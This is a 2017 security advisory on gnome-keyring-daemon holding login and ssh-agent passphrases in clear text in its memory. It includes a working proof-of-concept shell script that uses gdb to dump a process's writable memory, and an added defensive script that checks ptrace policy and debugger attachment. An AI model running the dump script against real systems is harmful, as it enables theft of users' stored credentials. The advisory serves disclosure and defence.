
Gnome Keyring Daemon Credential Disclosure

Posted on 24 April 2017

gnome-keyring-daemon is vulnerable to local credential disclosure. Fortunately, the attack can only be launched on already compromised machines, but sadly, in those cases, an attacker can leverage gnome-keyring-daemon to obtain sensitive data. The application stores the passwords of logged-in users in clear text in the process memory, and so exposes this information (such as the login password, the ssh-agent passphrase, etc.) to an attacker. In this scenario, he can read the data instantly, without cracking it or installing a keylogger, sniffer or various other tools, by using gnome-keyring-daemon itself: the information can be extracted from its memory using a debugger (such as "gdb").

At this URL, there is a script (named "memory_dump.sh") that can be used as a PoC: http://www.lucaercoli.it/

memory_dump.sh:

    #!/bin/bash
    # $1 is the PID of the target process; dumps are written to ./$1/
    mkdir "$1"
    cd "$1"
    # For every private read-write mapping, let gdb dump that address range to a file
    grep rw-p "/proc/$1/maps" | awk '{print $1}' | sed 's/-/ /' | while read mem_start mem_end; do
        gdb --pid "$1" --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"
    done
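The PoC depends on gdb being allowed to attach to a process owned by the same user. As an added example (not part of the advisory or of gnome-keyring), the script below reports the kernel's Yama ptrace policy and reads the TracerPid field that shows whether a debugger is currently attached to a process. The function names and the sample status lines are constructed for illustration, and the verdicts cover unprivileged same-user attach only.

```shell
#!/bin/bash
# Added example (not from the advisory): check whether a same-user debugger
# attach is permitted, and whether a process currently has a tracer attached.

# Map a Yama ptrace_scope value to a verdict for same-UID attach.
classify_ptrace_scope() {
    case "$1" in
        0|absent) echo "exposed" ;;  # classic rules: same-UID processes may attach
        1) echo "restricted" ;;      # only an ancestor or a nominated tracer may attach
        2) echo "admin-only" ;;      # attach requires CAP_SYS_PTRACE
        3) echo "disabled" ;;        # no process may attach
        *) echo "unknown" ;;
    esac
}

# Print the live policy value, or "absent" when the Yama sysctl is missing.
# The optional argument overrides the path (hypothetical parameter, for testing).
read_ptrace_scope() {
    local f="${1:-/proc/sys/kernel/yama/ptrace_scope}"
    if [ -r "$f" ]; then tr -d '[:space:]' < "$f"; else echo "absent"; fi
}

# Print the TracerPid field of a /proc/<pid>/status file (0 = not traced).
# Reads standard input when no file is given.
tracer_pid() {
    awk '/^TracerPid:/ { print $2; found = 1 }
         END { if (!found) print "unknown" }' ${1:+"$1"}
}

scope=$(read_ptrace_scope)
echo "ptrace_scope=$scope: $(classify_ptrace_scope "$scope")"

# Constructed sample: status excerpt of a process while a debugger is attached.
printf 'Name:\tgnome-keyring-d\nTracerPid:\t4242\n' | tracer_pid

# Optional: pass a PID to inspect a live process.
if [ -n "${1:-}" ] && [ -r "/proc/$1/status" ]; then
    echo "pid $1 TracerPid=$(tracer_pid "/proc/$1/status")"
fi
```

A non-zero TracerPid on the daemon while no debugging session is expected is worth alerting on; a ptrace_scope of 1 or higher stops the unprivileged same-user attach but not a tracer holding CAP_SYS_PTRACE.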

 
